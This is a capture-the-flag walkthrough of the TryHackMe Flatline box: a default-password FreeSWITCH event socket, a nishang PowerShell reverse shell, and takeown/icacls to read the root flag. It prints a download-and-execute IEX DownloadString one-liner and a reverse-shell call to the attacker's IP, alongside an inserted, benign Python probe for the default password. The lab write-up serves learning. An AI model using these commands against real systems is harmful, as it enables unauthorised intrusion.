Flatline TryHackMe Walkthrough

Introduction

Musyoka Ian
5 min readFeb 26, 2022

Hello guys, back again with another walkthrough. This time we’ll be tackling Flatline from TryHackMe. The box was created by a user called Nekrotic, and it is a really good one for beginners who find Windows boxes difficult: there are just two steps from the initial foothold to the root flag. The box starts with an open port 8021 running FreeSWITCH, and a little googling shows that the service, as it is configured here, hands remote code execution to anyone who can authenticate to it. After gaining a shell on the box we realise that we are already in the Administrators group, yet we still cannot read the root flag. Two Windows commands to take ownership of the file and rewrite its permissions, and the box is done. It was a really enjoyable box, so without further ado let’s jump in.

As always we’ll start off with an nmap scan of the box to find the open ports. Looking at the screenshot below we see that we have two open ports, namely

  1. Remote Desktop (RDP) running on port 3389
  2. FreeSWITCH (its event socket) running on port 8021

Remote Desktop (RDP) requires valid credentials, and at this point we do not even have a valid username for an account that exists on the box. Hence I decided to begin by enumerating port 8021, the FreeSWITCH event socket (mod_event_socket). This is a management interface, not a user-facing service: once a client authenticates with the password set in event_socket.conf.xml (the password FreeSWITCH ships with is ClueCon), it accepts the command api system <command> and runs that command on the host. A little google research turns up a python exploit for this service; it is worth understanding that there is no memory-corruption bug here, just a default password on an interface that executes commands by design, so the fix is a strong password and an access list on the socket rather than a patch.
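Before running someone else’s exploit it helps to see what it actually does on the wire, so here is an added example of the event socket exchange with both sides’ messages. This is not the exploit script from the post and not part of the original walkthrough: it authenticates to an event socket and reports whether the password was accepted (the real check for the weakness this box exploits), and runs only the harmless api status command, never api system. The wire format is FreeSWITCH’s Event Socket protocol (MIME-style headers ending in a blank line, plus an optional Content-Length body); the fake server, its canned status text and the hostnames are constructed here so the example runs offline.

```python
"""Probe a FreeSWITCH event socket (TCP 8021) for a default/weak password and
show the Event Socket protocol on both sides. Added example; offline via a
constructed fake server, so it never touches a real FreeSWITCH."""
import socket
import threading

DEFAULT_PASSWORD = "ClueCon"  # the password FreeSWITCH ships with in event_socket.conf.xml


def parse_headers(text):
    """'Key: value' lines -> dict; a bare command line such as 'auth X' has no colon and yields {}."""
    headers = {}
    for line in text.split("\n"):
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip()] = value.strip()
    return headers


class ESLConnection:
    """Buffered reader/writer for one event-socket connection (usable by either side)."""

    def __init__(self, sock):
        self.sock, self.buf = sock, b""

    def _fill(self):
        chunk = self.sock.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed the event socket")
        self.buf += chunk

    def read_block(self):
        """Return (raw_header_text, headers, body) for the next message."""
        while b"\n\n" not in self.buf:
            self._fill()
        raw, self.buf = self.buf.split(b"\n\n", 1)
        text = raw.decode("utf-8", "replace")
        headers = parse_headers(text)
        length = int(headers.get("Content-Length", "0"))
        while len(self.buf) < length:          # body is exactly Content-Length bytes
            self._fill()
        body, self.buf = self.buf[:length], self.buf[length:]
        return text, headers, body.decode("utf-8", "replace")

    def send_line(self, line):
        """Client commands are one line terminated by a blank line."""
        self.sock.sendall(line.encode() + b"\n\n")


def _authenticate(conn, password):
    """Consume the auth/request banner, send 'auth <password>', True on '+OK accepted'."""
    _, headers, _ = conn.read_block()
    if headers.get("Content-Type") != "auth/request":
        raise ValueError("not an ESL banner: %r" % headers)
    conn.send_line("auth " + password)
    _, headers, _ = conn.read_block()
    return headers.get("Reply-Text", "").startswith("+OK")


def esl_accepts_password(host, port, password=DEFAULT_PASSWORD, timeout=5.0):
    """True if the event socket at host:port accepts `password`; the check for this weakness."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return _authenticate(ESLConnection(s), password)


def esl_api(host, port, password, api_command, timeout=5.0):
    """Authenticate, run one 'api' command and return the api/response body."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        conn = ESLConnection(s)
        if not _authenticate(conn, password):
            raise PermissionError("event socket rejected the password")
        conn.send_line("api " + api_command)
        _, headers, body = conn.read_block()
        if headers.get("Content-Type") != "api/response":
            raise ValueError("unexpected reply: %r" % headers)
        return body


def start_fake_esl_server(password, api_responses):
    """Constructed stand-in for FreeSWITCH on a random loopback port; returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(client):
        conn = ESLConnection(client)
        client.sendall(b"Content-Type: auth/request\n\n")
        text, _, _ = conn.read_block()
        if text != "auth " + password:
            client.sendall(b"Content-Type: command/reply\nReply-Text: -ERR invalid\n\n")
            return  # FreeSWITCH drops the connection after a failed auth too
        client.sendall(b"Content-Type: command/reply\nReply-Text: +OK accepted\n\n")
        while True:
            text, _, _ = conn.read_block()
            if text.startswith("api "):
                body = api_responses.get(text[4:], "-ERR no such command").encode()
                client.sendall(b"Content-Type: api/response\nContent-Length: %d\n\n" % len(body) + body)

    def serve():
        while True:
            client, _ = srv.accept()
            with client:
                try:
                    handle(client)
                except OSError:  # client hung up (ConnectionError is an OSError)
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = start_fake_esl_server(DEFAULT_PASSWORD, {"status": "UP 0 years, 0 days, 1 hour"})
    print("default password accepted:", esl_accepts_password("127.0.0.1", port))
    print("api status ->", esl_api("127.0.0.1", port, DEFAULT_PASSWORD, "status"))
```

Against a real target you would call esl_accepts_password(target, 8021) and stop there: a True result is the finding, and the exploit the post downloads is simply this same exchange followed by api system <command>. The same function is a useful blue-team check against your own FreeSWITCH hosts after changing the password.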

I downloaded the exploit and ran it.

The exploit takes an IP address and a command to run once it has connected to the service. First I tried pinging myself to see whether the exploit actually worked. You might ask why I did not go for a reverse shell immediately, and the reason is that a reverse shell may or may not work. Some systems are heavily guarded (egress filtering, endpoint protection killing the process), and I could end up assuming the exploit failed because the service was not vulnerable when the real reason was that the shell was being blocked. A single ICMP echo to my own host is rarely considered malicious and is rarely blocked, so it is a much cleaner test of code execution.

So I specified the target and a command to run, in my case a ping, and on my own box I set up tcpdump to listen for incoming ICMP packets.

After running the exploit I saw the ping request on my tcpdump listener.

This confirms that we have remote code execution through the service. The next step, naturally, is getting a shell on the system, so that we can run commands interactively instead of one at a time through the exploit. I used a nishang reverse shell since they are easy to use. I am not sure whether nishang is installed by default on a fresh Kali; if not, just run the command

sudo apt install nishang

to install nishang on your system.

Next I copied nishang’s reverse shell script Invoke-PowerShellTcp.ps1 into my current working directory and made a few modifications.

I renamed the file to something shorter, shell.ps1.

Then I appended the following one-liner at the bottom of the script, so that the function is invoked as soon as the file is loaded:

Invoke-PowerShellTcp -Reverse -IPAddress 10.8.2.58 -Port 9001

All I added was my IP address and the port on which I would listen for the incoming shell connection.

I saved the script, started a netcat listener on port 9001 and a python web server on port 8000 to host the file.

Then I executed the payload with the command below:

python3 exploit.py 10.10.151.163 "cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://10.8.2.58:8000/shell.ps1')"

The command is passed through the exploit to the service, which runs it as a system command, hence the cmd /c prefix. PowerShell then fetches shell.ps1 from my web server with DownloadString and IEX executes it in memory, without anything touching the disk, and the line I appended fires the connection back. Going back to my netcat listener, we had a shell on the box.

Sweet! The next step is reading the user flag on the box.

You can now submit it and get the points. There is also a root.txt in the same folder, but when I tried reading it I got an access denied.

The next step is privilege escalation. I downloaded winPEAS to the box and ran it, and found that the account I was running as was already a member of the local Administrators group.

I also found a NetNTLMv2 hash for the user Nekrotic.

I tried cracking it with hashcat but it did not work. Being in the Administrators group does not by itself make every file readable: NTFS still enforces the file’s DACL, and the DACL on root.txt simply does not grant us read access. What Administrators do hold is the SeTakeOwnershipPrivilege, which lets us take ownership of a file regardless of its ACL, and as the owner we can then rewrite the DACL to grant ourselves access. I looked online for how to take full ownership of a file I could not access and found a really nice article.

We’ll use the two commands below to gain access to the root flag: the first takes ownership, the second grants full control.

takeown /R /F *.*
icacls "root.txt" /q /c /t /grant Users:F

Note that takeown /R /F *.* takes ownership of every file under the current directory, and the icacls line grants full control to the whole Users group; both permanently change ACLs on the target, so on a real engagement you would narrow them to the one file (takeown /F root.txt) and to your own account. Now reading the root flag with the cat command in PowerShell works, and we have the flag.

We can submit the flag for the full points, and the box is pretty much done. I hope you enjoyed it; if so, clap for me down below and don’t forget to follow me for upcoming walkthroughs.

Written by Musyoka Ian

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)